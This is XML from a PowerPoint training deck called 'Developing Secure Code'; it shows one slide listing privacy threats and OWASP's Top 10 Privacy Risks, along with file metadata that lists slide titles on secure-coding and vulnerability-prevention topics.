          <a:srcRect l="3101" t="9302" r="19380"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6234206" y="4800600"/>
            <a:ext cx="2645663" cy="206361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8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect users’ sensitive data from being exposed by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Independent hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Government agencies (foreign and domestic, intelligence services, police agencies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violent non-state actors (such as terrorist organizations and drug cartels)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users themselves—from inadvertently leaving sensitive information unprotected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP's list of the Top 10 Privacy Risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P1: Web Application Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P2: Operator-sided Data Leakage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P3: Insufficient Data Breach Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P4: Insufficient Deletion of Personal Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P5: Non-transparent Policies, Terms and Conditions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P6: Collection of data not required for the primary purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P7: Sharing of data with third party</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P8: Outdated personal data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P9: Missing or Insufficient Session Expiration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P10: Insecure Data Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy Vulnerability Defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4058040153"/>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Template>
  <TotalTime>437</TotalTime>
  <Words>12944</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1305</Paragraphs>
  <Slides>111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Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Segoe UI Black</vt:lpstr>
      <vt:lpstr>CNX</vt:lpstr>
      <vt:lpstr>Developing Secure Code</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Development Documentation and Deliverables</vt:lpstr>
      <vt:lpstr>Application and Data Integrity</vt:lpstr>
      <vt:lpstr>Remote Code Execution</vt:lpstr>
      <vt:lpstr>Common General Programming Errors (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Common General Programming Errors (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Insecure Deserialization (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Insecure Deserialization (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Guidelines for Secure Coding—1</vt:lpstr>
      <vt:lpstr>Guidelines for Secure Coding—2 (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Guidelines for Secure Coding—2 (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Guidelines for Secure Coding—3</vt:lpstr>
      <vt:lpstr>Activity: Researching Your Secure Coding Checklist</vt:lpstr>
      <vt:lpstr>Secure Coding Guides—Websites</vt:lpstr>
      <vt:lpstr>Buffer Overrun Defects (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Buffer Overrun Defects (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Buffer Overflows (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Buffer Overflows (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Buffer Overflow Defects</vt:lpstr>
      <vt:lpstr>Buffer Overreads</vt:lpstr>
      <vt:lpstr>Prevent Buffer Overread Defects</vt:lpstr>
      <vt:lpstr>Integer Overflows (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Integer Overflows (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Integer Overflow Defects (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Integer Overflow Defects (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Uncontrolled Format Strings (Slide 1 of 3)</vt:lpstr>
      <vt:lpstr>Uncontrolled Format Strings (Slide 2 of 3)</vt:lpstr>
      <vt:lpstr>Uncontrolled Format Strings (Slide 3 of 3)</vt:lpstr>
      <vt:lpstr>Insecure Output Encoding (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Insecure Output Encoding (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>XXE Attacks (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>XXE Attacks (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Guidelines to Prevent Formatting and Encoding Vulnerabilities</vt:lpstr>
      <vt:lpstr>Race Condition (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Race Condition (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Impact of Race Conditions on Threading/Multiprocessing</vt:lpstr>
      <vt:lpstr>Prevent Race Conditions</vt:lpstr>
      <vt:lpstr>Activity: Performing a Memory-Based Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OWASP Top Ten Platform Vulnerabilities</vt:lpstr>
      <vt:lpstr>Authentication</vt:lpstr>
      <vt:lpstr>Authorization</vt:lpstr>
      <vt:lpstr>Broken Authentication</vt:lpstr>
      <vt:lpstr>Provide Secure Authentication and Session Management</vt:lpstr>
      <vt:lpstr>Protect from Injection Attacks</vt:lpstr>
      <vt:lpstr>Prevent XSS</vt:lpstr>
      <vt:lpstr>Provide Secure Access Control (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Provide Secure Access Control (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Security Misconfiguration (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Security Misconfiguration (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Sensitive Data Exposure</vt:lpstr>
      <vt:lpstr>Provide Sufficient Attack Protection (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Provide Sufficient Attack Protection (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Prevent CSRF</vt:lpstr>
      <vt:lpstr>Use Secure Components (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Use Secure Components (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Make Sure APIs are Protected (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Make Sure APIs are Protected (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Use Platforms Properly (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Use Platforms Properly (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Store Data Securely (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Store Data Securely (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Provide Secure Communication (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Provide Secure Communication (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Provide Secure Authentication (Slide 1 of 2) </vt:lpstr>
      <vt:lpstr>Provide Secure Authentication (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Provide Sufficient Cryptography</vt:lpstr>
      <vt:lpstr>Provide Secure Authorization</vt:lpstr>
      <vt:lpstr>Ensure Client Code Quality</vt:lpstr>
      <vt:lpstr>Prevent Code Tampering and Reverse Engineering (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Prevent Code Tampering and Reverse Engineering (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Eliminate Extraneous Functionality</vt:lpstr>
      <vt:lpstr>Provide a Secure Web Interface</vt:lpstr>
      <vt:lpstr>Provide Secure Network Services</vt:lpstr>
      <vt:lpstr>Protect Data in Transit</vt:lpstr>
      <vt:lpstr>Protect Privacy</vt:lpstr>
      <vt:lpstr>Provide Secure Cloud and Mobile Interfaces</vt:lpstr>
      <vt:lpstr>Provide Flexible Security Configuration</vt:lpstr>
      <vt:lpstr>Provide Secure Software/Firmware on IoT Devices</vt:lpstr>
      <vt:lpstr>Physically Secure IoT Devices</vt:lpstr>
      <vt:lpstr>Desktop Application Vulnerabilities</vt:lpstr>
      <vt:lpstr>DLL Injection (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>DLL Injection (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Shellcode Injection (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Shellcode Injection (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Debugger Security</vt:lpstr>
      <vt:lpstr>Differences Among Desktop Platforms</vt:lpstr>
      <vt:lpstr>Managed vs. Unmanaged</vt:lpstr>
      <vt:lpstr>Desktop Application Attack Vectors</vt:lpstr>
      <vt:lpstr>Development Tool and Project Configuration</vt:lpstr>
      <vt:lpstr>Protect Memory in Desktop Applications</vt:lpstr>
      <vt:lpstr>Secure the User Interface</vt:lpstr>
      <vt:lpstr>Protect File and Data Storage</vt:lpstr>
      <vt:lpstr>Protect Network Communication</vt:lpstr>
      <vt:lpstr>Secure the Software Configuration</vt:lpstr>
      <vt:lpstr>Activity: Finding Common Web Vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Privacy Vulnerability Defects</vt:lpstr>
      <vt:lpstr>Privacy by Design</vt:lpstr>
      <vt:lpstr>Data Anonymization</vt:lpstr>
      <vt:lpstr>Protect Sensitive Information</vt:lpstr>
      <vt:lpstr>Anonymize Personal Data</vt:lpstr>
      <vt:lpstr>Prevent Operator-Sided Data Leakage</vt:lpstr>
      <vt:lpstr>Respond Appropriately to Data Breaches</vt:lpstr>
      <vt:lpstr>Delete Private or Sensitive Data That is No Longer Needed</vt:lpstr>
      <vt:lpstr>Make Sure Privacy Policies, Terms and Conditions are Clear</vt:lpstr>
      <vt:lpstr>Do Not Collect Non-Essential Data</vt:lpstr>
      <vt:lpstr>Do Not Share Data without Consent</vt:lpstr>
      <vt:lpstr>Activity: Handling Privacy Defects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Secure Code</dc:title>
  <dc:creator>Brian Sullivan</dc:creator>
  <cp:lastModifiedBy>Michelle Farney</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-16T19:08:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-14T15:52:20Z</dcterms:modified>
</cp:coreProperties>
</file>